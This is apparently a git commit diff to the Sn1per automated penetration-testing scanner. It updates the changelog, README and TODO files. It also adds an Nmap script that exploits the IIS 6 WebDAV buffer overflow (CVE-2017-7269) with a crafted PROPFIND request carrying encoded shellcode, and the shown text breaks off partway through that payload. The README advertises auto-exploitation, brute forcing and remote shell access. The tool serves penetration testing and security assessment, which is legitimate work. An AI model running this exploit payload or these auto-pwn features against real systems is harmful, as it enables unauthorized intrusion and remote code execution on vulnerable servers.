Sn1per by 1N3CrowdShield

Blackarch support

CHANGELOG.md

@@ -0,0 +1,180 @@
+## CHANGELOG:
+* v2.6c - Fixed errors with GooHak
+* v2.6c - Fixed syntax errors in sniper conditional statements 
+* v2.6b - Added CloudFail 
+* v2.6a - Fixed issue with [: ==: unary operator expected errors
+* v2.6 - Added Blackarch Linux support 
+* v2.6 - Added $BROWSER variable to set default browser
+* v2.5g - Updated README with update command
+* v2.5f - Fixes for various bugs reported and fixed by @ifly53e (https://github.com/1N3/Sn1per/pull/89)
+* v2.5e - Fixed issue with port 3128/tcp checks (CC. @ifly53e)
+* v2.5d - Added searchsploit option for (-v) to search all terms (CC. @ifly53e)
+* v2.5c - Added various improvements to 'discover' mode scans
+* v2.5b - Removed NMap script checks for 'fullportonly' mode
+* v2.5a - Added auto-updates to check and download new versions
+* v2.5a - Fixed issue with install.sh to resolve pip aha error
+* v2.5a - Added libxml2-utils to install.sh to meet dependencies
+* v2.5 - Added HTML report generation via sniper 'loot' command
+* v2.5 - Added automatic NMap searchsploit integration to find exploits
+* v2.5 - Added various improvements to Sn1per discovery scan mode
+* v2.5 - Fixed issue with IIS BoF NMap script (CC. ifly53e)
+* v2.4f - Fixed issue with upper NMap port range(CC. DaveW)
+* v2.4e - Added NMap no ping switch to all scans
+* v2.4d - Fixed issue with rpcinfo install script
+* v2.4d - Fixed issue with Arachni install script
+* v2.4c - Added loot and $TARGET sanity checks (CC. @menzow)
+* v2.4b - Fixed issue with discovery scan output file (CC. @ifly53e)
+* v2.4b - Fixed issue with Intel AMT RCE port list
+* v2.4a - Added all NMap script checks via 'fullportonly' mode
+* v2.4a - Added JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Metasploit exploit
+* v2.4a - Added Java RMI RCE NMap/Metasploit detection
+* v2.4a - Added INTEL-SA-00075 (Intel AMT) vulnerability NMap script
+* v2.4 - Added detection for open X11 servers
+* v2.4 - Added IIS6 Win2k3 RCE NMap script
+* v2.4 - Added option to disable Google Hacking queries via Firefox
+* v2.3d - Fixed issue with loot command
+* v2.3c - Added Apache Struts 2 RCE NMap script
+* v2.3c - Added Apache Struts 2 RCE NMap exploit
+* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
+* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
+* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
+* v2.2f - Added various optimizations and minor code fixes
+* v2.2e - Changed NMap scan options (removed -P0 flag)
+* v2.2d - Added MongoDB checks
+* v2.2d - Improved NMap scanning options
+* v2.2c - Added CouchDB checks
+* v2.2c - Updated Sub-domain takeover list
+* v2.2b - Added fullportonly mode to do exclusive full port scans
+* v2.2b - Fixed minor issue with Metasploit Pro not starting
+* v2.2b - Fixed minor issue with sniper loot command
+* v2.2a - Fixed minor issue with loot function
+* v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
+* v2.2 - Added Sn1per workspaces to loot directory
+* v2.1d - Added crt.sh sub-domain check
+* v2.1d - Removed blank screenshots from loot directory
+* v2.1c - Fixed issue with install.sh install directories
+* v2.1b - Added automatic Metasploit NMap xml imports for loot directory
+* v2.1b - Removed Zenmap
+* v2.1a - Separated Arachni reports for port 80/443/tcp
+* v2.1a - Fixed NMap full port scan options
+* v2.1 - Added Arachni with auto HTML web reporting (web mode only)
+* v2.1 - Added full NMap detailed port scans
+* v2.1 - Added port 4443/tcp checks
+* v2.1 - Added META tag scans for web apps
+* v2.1 - Removed Uniscan from web mode
+* v2.1 - Removed SQLMap from web mode
+* v2.0b - Added help option --help
+* v2.0a - Fixed issue with ssh-audit
+* v2.0a - Fixed issue with 'discover' mode
+* v2.0 - Updated sub-domain takeover list
+* v2.0 - Improved scan performance for stealth, airstrike and discover modes
+* v2.0 - Removed jexboss due to clear screen issue with output
+* v2.0 - Auto loot directory sorting for all tools
+* v2.0 - Updated install.sh package list
+* v1.9c - Enabled BruteX automated brute force attacks
+* v1.9b - Fixed MSSQL port 1433/tcp port scan check (@hacktrack)
+* v1.9a - Removed testssl script from stealth mode scans
+* v1.9 - Added Ubuntu docker image for Sn1per (@menzow)
+* v1.9 - Added automatic loot directory sorting for all modes
+* v1.9 - Added MSSQL port 1433/tcp checks
+* v1.9 - Added SNMP port 162/tcp checks (@hexageek)
+* v1.9 - Added nslookup to install.sh
+* v1.9 - Fixed install.sh dependency duplicates
+* v1.8c - Added -A option to all NMap port scans
+* v1.8c - Fixed install.sh permission issue
+* v1.8c - Fixed install.sh cleanup options
+* v1.8c - Added ssh-audit
+* v1.8c - Added install directory (/usr/share/sniper/) to install script for universal access
+* v1.8c - Fixed issue with Metasploit SSH scans
+* v1.8c - Added auto-update to install.sh to automatically pull latest github release
+* v1.8b - Fixed bug with NMap UDP scan options
+* v1.8b - Fixed install.sh dependencies 
+* v1.8b - Fixed jexboss options
+* v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy)
+* v1.8 - Added sub-domain hijack scans for all sub-domains
+* v1.8 - Added auto explort of all sub-domains to /domains directory
+* v1.8 - Added additional stealth and airstrike checks for port 80 and 443
+* v1.8 - Fixed issue with theHarvester not working with google
+* v1.7g - Added email security/spoofing checks
+* v1.7f - Added Zenmap XML auto-imports 
+* v1.7f - Added ClamAV RCE Nmap script
+* v1.7e - Fixed minor issue with airstrike and nuke mode
+* v1.7e - Fixed minor issues with discover mode
+* v1.7e - Added minor cosmetic improvements to reports
+* v1.7e - Disabled automatic brute forcing by default
+* v1.7e - Added automatic brute force setting in script vars
+* v1.7d - Added sslyze
+* v1.7d - Added 'discover' mode for full subnet scans
+* v1.7d - Added verbosity to scan tasks to separate sub-tasks better
+* v1.7c - Added plain text reporting 
+* v1.7c - Improved loot directory structure and sorting
+* v1.7b - Fixed issue with airstrike mode not scanning correctly
+* v1.7b - Improved passive recon performance
+* v1.7a - Improved NMap http scan performance
+* v1.7a - Removed joomscan due to verbosity issues
+* v1.7 - Added uniscan web vulnerability scanner
+* v1.7 - Added joomscan Joomla scanner
+* v1.7 - Improved web scan performance
+* v1.7 - Fixed issue with inurlbr output
+* v1.7 - Added remote desktop viewing for RDP connections
+* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
+* v1.6e - Added reporting option for nobrute mode (CC. @mero01)
+* v1.6e - Improved SMB scan performance/optimization added
+* v1.6d - Improved NMap scan performance options
+* v1.6d - Added xprobe2 OS finger printing tool
+* v1.6d - Added jexbos JBoss autopwn
+* v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
+* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
+* v1.6c - Add report mode for web scans
+* v1.6c - Fixed issues with Sublist3r and theharvester
+* v1.6c - Added Shocker Shellshock exploitation scanner
+* v1.6b - Added Sublist3r sub-domain brute tool
+* v1.6b - Added cutycapt web screenshot util
+* v1.6a - Added improvements to recon phase
+* v1.6a - Fixed small issue with 3rd party extension
+* v1.6a - Various improvements to overall optimization of scans
+* v1.6a - Added new "web" mode for full web application scans 
+* v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke
+* v1.6 - Added Java de-serialization scanner
+* v1.6 - Added reporting option to output to console and text file for all scans
+* v1.6 - Added option to set Sn1per full path for universal command line access
+* v1.6 - Added in DirBuster for web file brute forcing
+* v1.6 - Fixed issue with sderr errors in TheHarvester
+* v1.5e - Removed shodan command line tool due to issues
+* v1.5e - Fixed wafwoof installation in kali 2.0
+* v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks
+* v1.5c - Fixed issue which broke link to sniper directory
+* v1.5b - Added Squid Proxy checks port 3128/tcp
+* v1.5b - Fixed shodan setup options in install.sh
+* v1.5b - Fixed syntax error with theHarvester in install.sh
+* v1.5a - Fixed syntax error with port 8081 checks
+* v1.5a - Added Arachni integration
+* v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits
+* v1.5 - Added Metasploit scan and auto-exploit modules
+* v1.5 - Added additional port checks
+* v1.5 - Added full TCP/UDP NMap XML output
+* v1.5 - Auto tune scan for either IP or hostname/domain
+* v1.4h - Added auto IP/domain name scan configurations
+* v1.4g - Added finger enumeration scripts
+* v1.4g - Fixed nmap -p 445 target issue
+* v1.4g - Fixed smtp-enum target issue
+* v1.4f - Fixed BruteX directory bug
+* v1.4e - Fixed reported errors install.sh
+* v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs
+* v1.4d - Fixed missing rake gem install dependency
+* v1.4c - Reordered 3rd party extensions
+* v1.4b - Fixed install.sh executable references
+* v1.4b - Fixed Yasou dependencies in install.sh
+* v1.4b - Fixed minor issues with BruteX loot directory
+* v1.4 - Added Yasou for automatic web form brute forcing
+* v1.4 - Added MassBleed for SSL vulnerability detection
+* v1.4 - Added Breach-Miner for detection of breached accounts
+* v1.4 - Fixed minor errors with nmap
+* v1.4 - Removed debug output from goohak from displaying on console
+
+## FUTURE:
+* Add auto logging and reporting to all scans
+* Add HTML reporting for scans
+* Add automated Wireless attacks to Sn1per
+* Add automated MITM attacks to Sn1per
+* Add web mode port option for customized web scans

README.md

@@ -1,139 +1,83 @@
-# Sn1per - Automated Pentest Recon Scanner
-![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png)
+![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.jpg)
 
 ## ABOUT:
 Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. 
 
+## DEMO VIDEO:
+[![Sn1per Demo](https://img.youtube.com/vi/nA_V_u3QZA4/0.jpg)](https://www.youtube.com/watch?v=nA_V_u3QZA4)
+
 ## FEATURES:
 * Automatically collects basic recon (ie. whois, ping, DNS, etc.)
 * Automatically launches Google hacking queries against a target domain
-* Automatically enumerates open ports
-* Automatically brute forces sub-domains and DNS info
+* Automatically enumerates open ports via NMap port scanning
+* Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
 * Automatically checks for sub-domain hijacking
 * Automatically runs targeted NMap scripts against open ports
 * Automatically runs targeted Metasploit scan and exploit modules
 * Automatically scans all web applications for common vulnerabilities
-* Automatically brute forces all open services
-* Automatically exploit remote hosts to gain remote shell access
-* Performs high level enumeration of multiple hosts
+* Automatically brute forces ALL open services
+* Automatically test for anonymous FTP access
+* Automatically runs WPScan, Arachni and Nikto for all web services
+* Automatically enumerates NFS shares
+* Automatically test for anonymous LDAP access
+* Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
+* Automatically enumerate SNMP community strings, services and users
+* Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
+* Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
+* Automatically tests for open X11 servers
 * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
+* Performs high level enumeration of multiple hosts and subnets
+* Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
+* Automatically gathers screenshots of all web sites
+* Create individual workspaces to store all scan output
 
-## INSTALL:
+## KALI LINUX INSTALL:
 ```
-./install.sh - Installs all dependencies OR upgrades existing Sn1per installations. Best run from Kali Linux. 
+./install.sh
+```
+
+## DOCKER INSTALL:
+
+Docker Install:
+https://github.com/menzow/sn1per-docker
+
+Docker Build:
+https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
+
+Example usage:
+```
+$ docker pull menzo/sn1per-docker
+$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io
 ```
 
 ## USAGE:
 ```
-# sniper <target> <report>
-# sniper <target> stealth <report>
-# sniper <CIDR> discover
-# sniper <target> port <portnum> 
-# sniper <target> web <report>
-# sniper <target> nobrute <report>
-# sniper <targets.txt> airstrike <report>
-# sniper <targets.txt> nuke <report>
+sniper <target> <report>
+sniper <target> stealth <report>
+sniper <CIDR> discover
+sniper <target> port <portnum> 
+sniper <target> fullportonly <portnum>
+sniper <target> web <report>
+sniper <target> nobrute <report>
+sniper <targets.txt> airstrike <report>
+sniper <targets.txt> nuke <report>
+sniper loot
+sniper update
 ```
 
 ### MODES:
-* REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
-* STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
-* DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
-* PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
-* WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.   
-* NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.
-* AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
-* NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. 
+* **REPORT:** Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
+* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
+* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
+* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
+* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
+* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.   
+* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
+* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
+* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. 
+* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.
+* **UPDATE:** Checks for updates and upgrades all components used by sniper.
 
 ## SAMPLE REPORT:
-```
 https://gist.github.com/1N3/8214ec2da2c91691bcbc
-```
 
-## CHANGELOG:
-* v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy)
-* v1.8 - Added sub-domain hijack scans for all sub-domains
-* v1.8 - Added auto explort of all sub-domains to /domains directory
-* v1.8 - Added additional stealth and airstrike checks for port 80 and 443
-* v1.8 - Fixed issue with theHarvester not working with google
-* v1.7g - Added email security/spoofing checks
-* v1.7f - Added Zenmap XML auto-imports 
-* v1.7f - Added ClamAV RCE Nmap script
-* v1.7e - Fixed minor issue with airstrike and nuke mode
-* v1.7e - Fixed minor issues with discover mode
-* v1.7e - Added minor cosmetic improvements to reports
-* v1.7e - Disabled automatic brute forcing by default
-* v1.7e - Added automatic brute force setting in script vars
-* v1.7d - Added sslyze
-* v1.7d - Added 'discover' mode for full subnet scans
-* v1.7d - Added verbosity to scan tasks to separate sub-tasks better
-* v1.7c - Added plain text reporting 
-* v1.7c - Improved loot directory structure and sorting
-* v1.7b - Fixed issue with airstrike mode not scanning correctly
-* v1.7b - Improved passive recon performance
-* v1.7a - Improved NMap http scan performance
-* v1.7a - Removed joomscan due to verbosity issues
-* v1.7 - Added uniscan web vulnerability scanner
-* v1.7 - Added joomscan Joomla scanner
-* v1.7 - Improved web scan performance
-* v1.7 - Fixed issue with inurlbr output
-* v1.7 - Added remote desktop viewing for RDP connections
-* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
-* v1.6e - Added reporting option for nobrute mode (CC. @mero01)
-* v1.6e - Improved SMB scan performance/optimization added
-* v1.6d - Improved NMap scan performance options
-* v1.6d - Added xprobe2 OS finger printing tool
-* v1.6d - Added jexbos JBoss autopwn
-* v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
-* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
-* v1.6c - Add report mode for web scans
-* v1.6c - Fixed issues with Sublist3r and theharvester
-* v1.6c - Added Shocker Shellshock exploitation scanner
-* v1.6b - Added Sublist3r sub-domain brute tool
-* v1.6b - Added cutycapt web screenshot util
-* v1.6a - Added improvements to recon phase
-* v1.6a - Fixed small issue with 3rd party extension
-* v1.6a - Various improvements to overall optimization of scans
-* v1.6a - Added new "web" mode for full web application scans 
-* v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke
-* v1.6 - Added Java de-serialization scanner
-* v1.6 - Added reporting option to output to console and text file for all scans
-* v1.6 - Added option to set Sn1per full path for universal command line access
-* v1.6 - Added in DirBuster for web file brute forcing
-* v1.6 - Fixed issue with sderr errors in TheHarvester
-* v1.5e - Removed shodan command line tool due to issues
-* v1.5e - Fixed wafwoof installation in kali 2.0
-* v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks
-* v1.5c - Fixed issue which broke link to sniper directory
-* v1.5b - Added Squid Proxy checks port 3128/tcp
-* v1.5b - Fixed shodan setup options in install.sh
-* v1.5b - Fixed syntax error with theHarvester in install.sh
-* v1.5a - Fixed syntax error with port 8081 checks
-* v1.5a - Added Arachni integration
-* v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits
-* v1.5 - Added Metasploit scan and auto-exploit modules
-* v1.5 - Added additional port checks
-* v1.5 - Added full TCP/UDP NMap XML output
-* v1.5 - Auto tune scan for either IP or hostname/domain
-* v1.4h - Added auto IP/domain name scan configurations
-* v1.4g - Added finger enumeration scripts
-* v1.4g - Fixed nmap -p 445 target issue
-* v1.4g - Fixed smtp-enum target issue
-* v1.4f - Fixed BruteX directory bug
-* v1.4e - Fixed reported errors install.sh
-* v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs
-* v1.4d - Fixed missing rake gem install dependency
-* v1.4c - Reordered 3rd party extensions
-* v1.4b - Fixed install.sh executable references
-* v1.4b - Fixed Yasou dependencies in install.sh
-* v1.4b - Fixed minor issues with BruteX loot directory
-* v1.4 - Added Yasou for automatic web form brute forcing
-* v1.4 - Added MassBleed for SSL vulnerability detection
-* v1.4 - Added Breach-Miner for detection of breached accounts
-* v1.4 - Fixed minor errors with nmap
-* v1.4 - Removed debug output from goohak from displaying on console
-
-## FUTURE:
-* Add install.sh for Ubuntu based systems
-* Add install path to install.sh for universal access
-* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)

TODO.md

@@ -0,0 +1,7 @@
+###TODO:
+
+* Add web port scans for directed web scans
+* Add proxy support for all scans
+* Add various modes (airstrike,nuke,web,etc.) for discovery scans
+* Add automatic reporting for all scans by default
+* Add reporting for discover mode

bin/iis-buffer-overflow.nse

@@ -0,0 +1,181 @@
+local nmap = require "nmap"
+local string = require "string"
+local shortport = require "shortport"
+local vulns = require "vulns"
+
+-- NSE Buffer Overflow vulnerability in IIS
+
+---
+-- @usage
+-- ./nmap iis-buffer-overflow <target>
+--
+-- @output
+-- PORT   STATE  SERVICE
+-- 80/tcp open   http
+-- |  iis-buffer-overflow:
+-- |    VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
+-- |       State: LIKELY_VULNERABLE
+-- |       Risk factor: High CVSS: 10.0
+-- |       Description:
+-- |         Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
+-- |         service in Internet Information Services (IIS) 6.0
+-- |         in Microsoft Windows Server 2003 R2 allows remote attackers to execute
+-- |         arbitrary code via a long header beginning with "If: <http://" in a
+-- |         PROPFIND request, as exploited in the wild in July or August 2016.
+-- |
+-- |         Original exploit by Zhiniang Peng and Chen Wu.
+-- |
+-- |    References:
+-- |     https://github.com/edwardz246003/IIS_exploit,
+-- |_    https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
+--
+
+author = {
+  "Zhiniang Peng", -- Original author
+  "Chen Wu",       -- Original author
+  "Rewanth Cool"   -- NSE script author
+}
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"exploit", "vuln", "intrusive"}
+
+portrule = shortport.portnumber(80, "tcp")
+
+action = function(host, port)
+  local socket, response, try, catch, payload, shellcode, vulnerable_name
+
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  local vuln = {
+    title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
+    state = vulns.STATE.NOT_VULN,
+    risk_factor = "High",
+    description = [[
+Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
+in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
+with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
+
+Original exploit by Zhiniang Peng and Chen Wu.
+    ]],
+    IDS = {
+      CVE = 'CVE-2017-7269'
+    },
+    scores = {
+      CVSS = '10.0'
+    },
+    references = {
+      'https://github.com/edwardz246003/IIS_exploit',
+      'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
+    },
+    dates = {
+      disclosure = {year = '2017', month = '03', day = '26'},
+    }
+  }
+
+  -- If domain name doesn't exist this line of code takes ip into consideration
+  vulnerable_name = host.targetname or host.ip
+
+  socket = nmap.new_socket()
+  catch = function()
+    socket:close()
+  end
+
+  try = nmap.new_try(catch)
+  try(socket:connect(host, port))
+
+  -- Crafting the payload by parts
+
+  -- Crafting the request with HTTP PROPFIND method
+  payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
+  payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
+
+  -- Random text added to payload (Can be modified only for experimental purposes)
+  payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
+  payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
+  payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
+  payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
+  payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
+  payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
+  payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
+  payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
+  payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
+  payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
+  payload = payload .. '\xb3\xe3\x95\xb7'
+
+  -- Main payload (Do not edit this part)
+  payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
+  payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
+  payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
+  payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
+  payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
+  payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
+  payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
+
+  payload = payload .. '>'
+  payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
+
+  -- Random text added to payload (Can be modified only for experimental purposes)
+  payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
+  payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
+  payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
+  payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
+  payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
+  payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
+  payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
+  payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
+  payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
+  payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
+
+  -- Main payload (Do not edit this part)
+  payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
+  payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
+  payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
+  payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
+  payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
+  payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
+  payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
+  payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
+  payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
